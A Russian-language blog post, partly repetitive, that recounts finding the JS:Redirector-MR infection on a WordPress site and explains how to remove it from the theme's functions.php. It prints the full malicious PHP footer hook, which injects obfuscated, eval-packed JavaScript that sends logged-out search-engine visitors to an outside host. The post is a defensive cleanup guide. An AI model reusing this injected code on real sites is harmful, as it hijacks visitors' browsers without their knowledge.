Ничего не поменялось. Сайт чувствовал себя прекрасно, все дивным образом работало, только почему-то резко обвалилась посещаемость. Мало ли что, вдруг это новогодние праздники и, вместо того, чтобы читать про индийские путешествия, пипл в панике мечется по магазинам в поисках подарков и красной икры для ритуальных бутербродов. Да чего уж там, я и сам метался по магазинам в пароксизмах предновогоднего шопинга.
Я, наверно еще долго ничего бы не узнал, если бы не зашел на сайт с компьютера знакомого параноика. Он панически боится вирусов и "большого брата", не пользуется вайфай и подключает кабель к ноутбуку только когда осознанно выходит в сеть. Когда я набрал свой адрес и жмакнул энтер, вся его параноидальная защита истерически заверещала.
не бойтесь, это нормально. Но на всякий случай нередактированный файл перед экспериментами стоит, на всякий случай, сохранить отдельно.
После успешного лечения есть смысл поменять пароли на хостинг и на админку wordpress. Очевидно, что тот, кто Вам подарил этот триппер один из Ваших старых паролей уже знает. Кроме того, даже если у Вас нет подозрений, что Вы подхватили этот трипперок, - проверьтесь для профилактики. В буржуйском инете пишут, что более 100 000 блогов wordpress уже заражены.
Я, наверно еще долго ничего бы не узнал, если бы не зашел на сайт с компьютера знакомого параноика. Он панически боится вирусов и "большого брата", не пользуется вайфай и подключает кабель к ноутбуку только когда осознанно выходит в сеть. Когда я набрал свой адрес и жмакнул энтер, вся его параноидальная защита истерически заверещала.
-- Все, все, хватит, ты заразишь мне компьютер, придется все переустанавливать!Единственное, что я успел увидеть -- Redirector-MR. Этого, впрочем, оказалось достаточно. Когда я вернулся домой, гугл подтвердил уверенность параноика. Это был вирус. Удалить его, как оказалось, проще не бывает. Он живет в файле functions.php темы. Поэтому, в зависимости от кривизны рук есть несколько способов его устранения.
-- Ты параноик! Это все твоя мания, у меня на сайте ничего нет и быть не может, - все вот этими руками ...
-- Нет, у тебя на сайте вирус.
-- Та ладно, это твои маньяческие антивирусы так реагируют на скрипты счетчиков и Адсенс.
-- Нет это вирус. Все.
- Если Вы писали тему сами то откройте Ваш functions.php и Вы увидите в конце файла чужой большой фрагмент кода с хаотическими наборами буквочек и циферок. Ядовитый фрагмент нужно удалить и файл сохранить. Все.
- Если тема не Ваша - просто переустановите тему из оригинального файла и, на всякий случай, убедитесь, что в конце файла functions.php нет кода, состоящего из длинного бессмысленного набора символов.
Как избавиться от JS:Redirector-MR [Trj] в блоге Wordpress?
Открыть в редакторе в консоли Wordpress файл functions.php и удалить код вируса, который расположен в конце файла. Если у Вас останется в этом файле всего 4 строчки:<?php
if ( function_exists('register_sidebars') )
register_sidebars(2);
?>
не бойтесь, это нормально. Но на всякий случай нередактированный файл перед экспериментами стоит, на всякий случай, сохранить отдельно.
Удалять текст вируса нужно после символов ?>
Начиная с<?phpдо конца фрагмента:
function _verify_activeatewidgets()
<?phpСобственно, по последнему куску из множества символов в файле functions.php вирус легко распознается.
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>
После успешного лечения есть смысл поменять пароли на хостинг и на админку wordpress. Очевидно, что тот, кто Вам подарил этот триппер один из Ваших старых паролей уже знает. Кроме того, даже если у Вас нет подозрений, что Вы подхватили этот трипперок, - проверьтесь для профилактики. В буржуйском инете пишут, что более 100 000 блогов wordpress уже заражены.
